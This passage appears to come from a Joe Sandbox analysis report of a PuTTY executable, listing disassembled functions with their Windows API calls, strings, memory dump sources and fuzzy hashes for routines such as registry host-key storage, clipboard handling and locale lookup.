                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleLocalProcess$AllocCopyCurrentErrorFreeLastLengthOpen
                                                          • String ID:
                                                          • API String ID: 621491157-0
                                                          • Opcode ID: 27e7f927fd25ed966583dab985a314eaeb2b38f577c0d989e7cc8882c1532234
                                                          • Instruction ID: c739d5bb5a5563889a79f9ba31e4e6f6d1188b97952c35a4cc0b530e19f1dc85
                                                          • Opcode Fuzzy Hash: 27e7f927fd25ed966583dab985a314eaeb2b38f577c0d989e7cc8882c1532234
                                                          • Instruction Fuzzy Hash: B841A76371E94352FA50AB629464B36E391BFC9B80FC55134DD4E47B84DE3EE801B728
                                                          Function 00007FF738A5A1D0 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 317comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID: Pageant.exe$Recent Sessions
                                                          • API String ID: 542301482-148644000
                                                          • Opcode ID: 21f3de52a39758685c7ac004dfb5942c0e32d41c1c7cd75dddfe1f2ef8670176
                                                          • Instruction ID: 32b3aeffd0f2d3221274586a1a4f1f169389dca1362bf480d505d245fae0d053
                                                          • Opcode Fuzzy Hash: 21f3de52a39758685c7ac004dfb5942c0e32d41c1c7cd75dddfe1f2ef8670176
                                                          • Instruction Fuzzy Hash: A8E17C73709A4692EB00AB26E45476EF761FB84B84F904132EE8E47B64CF7EE045D724
                                                          Function 00007FF738B0CAC8 Relevance: 10.8, APIs: 7, Instructions: 286COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID:
                                                          • API String ID: 3215553584-0
                                                          • Opcode ID: ed24f58531aa6ad5e8e22adab06f1d20053f452e4d94b918fef4e23718f1ab7f
                                                          • Instruction ID: 64c68ee9bebb20c17af886ebc0f51527ecc823f9fff879b0b1bc5ce99ebd6042
                                                          • Opcode Fuzzy Hash: ed24f58531aa6ad5e8e22adab06f1d20053f452e4d94b918fef4e23718f1ab7f
                                                          • Instruction Fuzzy Hash: 37C1F4A3A0868765E760BB11D420B7DF790EB45B80FC40231DA6E07391DF7EE455A72B
                                                          Function 00007FF738A68EB0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 210registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF738A72CE0: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DAD
                                                            • Part of subcall function 00007FF738A72CE0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DF6
                                                            • Part of subcall function 00007FF738A72FD0: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000001,00007FFE21E98EC0,00007FF738A69836), ref: 00007FF738A7300D
                                                            • Part of subcall function 00007FF738A72FD0: RegQueryValueExA.ADVAPI32 ref: 00007FF738A73054
                                                          • RegCloseKey.ADVAPI32 ref: 00007FF738A68F42
                                                          • RegCloseKey.ADVAPI32 ref: 00007FF738A68F83
                                                          • RegCloseKey.ADVAPI32 ref: 00007FF738A6918F
                                                            • Part of subcall function 00007FF738A730C0: RegSetValueExA.ADVAPI32 ref: 00007FF738A730F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Close$Value$Query$Create
                                                          • String ID: %s@%d:$Software\SimonTatham\PuTTY\SshHostKeys$rsa
                                                          • API String ID: 306613542-1153710622
                                                          • Opcode ID: 22983a14b1d316992aa0a701730698535de5f07b572e056d628e82751c4d61ad
                                                          • Instruction ID: d41275139694eba4bff21b812a623f43d74f1a7a8f5ddbe46367dfafa899bbed
                                                          • Opcode Fuzzy Hash: 22983a14b1d316992aa0a701730698535de5f07b572e056d628e82751c4d61ad
                                                          • Instruction Fuzzy Hash: 0E812C23F0E65362FE10B7119811BBAE695AF45BC0FC85031EE0D0778AEE3EE405A364
                                                          Function 00007FF738A57F03 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ChooseColor
                                                          • String ID: !c->data$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$All Files (*.*)
                                                          • API String ID: 2281747019-681713042
                                                          • Opcode ID: 96e0aa618a942cebe86d2f89f707d8f575f8aafc0d9066a750c418d4dbeb62dc
                                                          • Instruction ID: 3a913b561ce4d9b2131fc2a111a90f7c6e9cecd10f27563a4f76a756c4ebd7a2
                                                          • Opcode Fuzzy Hash: 96e0aa618a942cebe86d2f89f707d8f575f8aafc0d9066a750c418d4dbeb62dc
                                                          • Instruction Fuzzy Hash: E291F5B3A09A8695FB24AB15E4447BAE3A0FB54784F840235CA8D03794DF3EE4C1D758
                                                          Function 00007FF738B08044 Relevance: 10.7, APIs: 7, Instructions: 172COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF738B019C8: GetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019D7
                                                            • Part of subcall function 00007FF738B019C8: FlsGetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019EC
                                                            • Part of subcall function 00007FF738B019C8: SetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A77
                                                            • Part of subcall function 00007FF738B019C8: FlsSetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A0D
                                                          • GetUserDefaultLCID.KERNEL32(00000000,00000092,?,?), ref: 00007FF738B081B4
                                                            • Part of subcall function 00007FF738B019C8: FlsSetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A3A
                                                            • Part of subcall function 00007FF738B019C8: FlsSetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A4B
                                                            • Part of subcall function 00007FF738B019C8: FlsSetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A5C
                                                          • EnumSystemLocalesW.KERNEL32(00000000,00000092,?,?,00000000,?,?,00007FF738AF7139), ref: 00007FF738B0819B
                                                          • ProcessCodePage.LIBCMT ref: 00007FF738B081DE
                                                          • IsValidCodePage.KERNEL32 ref: 00007FF738B081F0
                                                          • IsValidLocale.KERNEL32 ref: 00007FF738B08206
                                                          • GetLocaleInfoW.KERNEL32 ref: 00007FF738B08262
                                                          • GetLocaleInfoW.KERNEL32 ref: 00007FF738B0827E
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                          • String ID:
                                                          • API String ID: 2591520935-0
                                                          • Opcode ID: 438a1dc1a42509d40de4727ebc564ed6d237db6cb106d87274f19b125cb36c2f
                                                          • Instruction ID: 5ece0b777a8ef11048e5008d3e4a99c9712b574aca21f30052e9a5a306017cfb
                                                          • Opcode Fuzzy Hash: 438a1dc1a42509d40de4727ebc564ed6d237db6cb106d87274f19b125cb36c2f
                                                          • Instruction Fuzzy Hash: B871A2A3B14A03A9FB50AB60DC50ABDE3A0BF48744F844435CA2D13695DF3EA545E32B
                                                          Function 00007FF738A5FB90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Find$File$CloseCurrentDirectoryFirstNextProcessWindows
                                                          • String ID: \*
                                                          • API String ID: 1945953020-2355939697
                                                          • Opcode ID: c7e415f53ad172fa56265f2095ba27e10f40c8429aec3f901a8c6452d8334537
                                                          • Instruction ID: 991965dbbb5acac5a867efcc8ef11b2c4c4463925e2d85be2fe26c4521672bbe
                                                          • Opcode Fuzzy Hash: c7e415f53ad172fa56265f2095ba27e10f40c8429aec3f901a8c6452d8334537
                                                          • Instruction Fuzzy Hash: 3C21C15271964252EA10AB21E9147BBE321AF86790F844332DE9D07BD9CE3DD806D715
                                                          Function 00007FF738A844D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 60libraryfileloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressCloseFileFindFirstHandleProc
                                                          • String ID: GetFileAttributesExW$P$kernel32.dll
                                                          • API String ID: 3854970465-413229572
                                                          • Opcode ID: 010433d40aab4d1f39609f87f10a2d8bcd3ce873c87075a3ff0ec20f4c72a497
                                                          • Instruction ID: 8af1c30d65f519f945e0fa1f035dd14ef2abaa643280d73dca00edee9ae5c67e
                                                          • Opcode Fuzzy Hash: 010433d40aab4d1f39609f87f10a2d8bcd3ce873c87075a3ff0ec20f4c72a497
                                                          • Instruction Fuzzy Hash: 76219463A0EA03A1FA25BB24A454779E790AF84790FC55231C85D03694DF3EED05A639
                                                          Function 00007FF738A59B20 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteFontMetricsReleaseSelectText
                                                          • String ID:
                                                          • API String ID: 4134816134-0
                                                          • Opcode ID: a57eaa443a6808219bac4f806e2e77796c616df6bb42f2798159f1ddc5050f0f
                                                          • Instruction ID: a9fb7ea8dfd1c516596a6d6886a4abf47cddf96f835e8e064a8cd6c9ef60c47e
                                                          • Opcode Fuzzy Hash: a57eaa443a6808219bac4f806e2e77796c616df6bb42f2798159f1ddc5050f0f
                                                          • Instruction Fuzzy Hash: 9F3126B360D24256FB60AF11F41472BE791EB84B84F980238DA8D0B784CF3EE4849714
                                                          Function 00007FF738B02F94 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 5d8d99922716eab91e2375c09dc28ee8bf9e8a2aaa4ed0871c869ba54e67ecc4
                                                          • Instruction ID: b8ecde3ceedfd4872d63f3ee23701aed887e5df7325234f78873a387578dbd69
                                                          • Opcode Fuzzy Hash: 5d8d99922716eab91e2375c09dc28ee8bf9e8a2aaa4ed0871c869ba54e67ecc4
                                                          • Instruction Fuzzy Hash: BE31C333608F8296DB60DF24E8406AEB3A0FB89754F940136EA9D43B98EF3DD545CB14
                                                          Function 00007FF738AF16C0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 329COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: memcpy_s
                                                          • String ID: $MZx
                                                          • API String ID: 1502251526-1316729395
                                                          • Opcode ID: 69486cbbc19a2623685bb29a29dd9abea43b40b3d716ac5c971c872a33089713
                                                          • Instruction ID: b854f58a66c30003bd168191259aaac7217340afdb6499e29c34a9143bae2527
                                                          • Opcode Fuzzy Hash: 69486cbbc19a2623685bb29a29dd9abea43b40b3d716ac5c971c872a33089713
                                                          • Instruction Fuzzy Hash: C9C12673B1A68697E721DF19E488E6AF791F784784F848236DB4A43744DB3EE800CB44
                                                          Function 00007FF738A372F0 Relevance: 9.1, APIs: 6, Instructions: 63clipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ClipboardGlobal$AllocDataEmptyLockOpenUnlock
                                                          • String ID:
                                                          • API String ID: 2715784024-0
                                                          • Opcode ID: f65d7b619d670f9def71b8ccb8791a53fa415f51f2e79dfe868a62d8489b4d43
                                                          • Instruction ID: 61fb2bce3bcfebf4f5ef43227054c13ff9be7aee57398306a64f2e0d226917e9
                                                          • Opcode Fuzzy Hash: f65d7b619d670f9def71b8ccb8791a53fa415f51f2e79dfe868a62d8489b4d43
                                                          • Instruction Fuzzy Hash: 6411A353B0B113A1FB96AB52BD44678D391AF46BE2F444135CD0D06790EE3E68CBA225
                                                          Function 00007FF738B157C4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106timeCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _get_daylight.LIBCMT ref: 00007FF738B157F2
                                                            • Part of subcall function 00007FF738B1567C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF738B15690
                                                          • _get_daylight.LIBCMT ref: 00007FF738B15814
                                                            • Part of subcall function 00007FF738B1564C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF738B15660
                                                            • Part of subcall function 00007FF738B02E14: HeapFree.KERNEL32(?,?,?,00007FF738B06CB2,?,?,?,00007FF738B06873,?,?,00000000,00007FF738B07544,?,?,?,00007FF738B0744F), ref: 00007FF738B02E2A
                                                            • Part of subcall function 00007FF738B02E14: GetLastError.KERNEL32(?,?,?,00007FF738B06CB2,?,?,?,00007FF738B06873,?,?,00000000,00007FF738B07544,?,?,?,00007FF738B0744F), ref: 00007FF738B02E34
                                                          • GetTimeZoneInformation.KERNEL32(?,?,00000000,00000000,?,00007FF738B15D20), ref: 00007FF738B1583B
                                                          • _get_daylight.LIBCMT ref: 00007FF738B15803
                                                            • Part of subcall function 00007FF738B1561C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF738B15630
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                          • String ID: ?
                                                          • API String ID: 3458911817-1684325040
                                                          • Opcode ID: 2b6b4a963b51cb6709a98ac0e75c519885e7eed0e61c83a05d89b95f896a1079
                                                          • Instruction ID: 6a2bfe57b5c18e2cc83aa4e605b9439cf71f9cb9bd3bab6552faceda92c9604d
                                                          • Opcode Fuzzy Hash: 2b6b4a963b51cb6709a98ac0e75c519885e7eed0e61c83a05d89b95f896a1079
                                                          • Instruction Fuzzy Hash: EA41B473A08643A6E710FF36D8804A9F762BB98384F804135EA4D47796DF3EF401A769
                                                          Function 00007FF738A57D6D Relevance: 7.7, APIs: 5, Instructions: 180windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Item$MessageSend$ChooseColorText
                                                          • String ID:
                                                          • API String ID: 2403525919-0
                                                          • Opcode ID: 8fe9ce5eceecc9f7bdc44b4e3153c9592783cfd2ff9f987fc3dcb28a15ba7c29
                                                          • Instruction ID: 412f6b6b0fc198193d41987cc0b8c2e7b2c605a016a0fc3f0992f57f6601d0ba
                                                          • Opcode Fuzzy Hash: 8fe9ce5eceecc9f7bdc44b4e3153c9592783cfd2ff9f987fc3dcb28a15ba7c29
                                                          • Instruction Fuzzy Hash: 9C71C8B3A0964699E764EB15E44077AE7A0FB45B84F845235DF8D03B45CF3EE880E364
                                                          Function 00007FF738AA6FD0 Relevance: 7.6, APIs: 5, Instructions: 77threadCOMMON
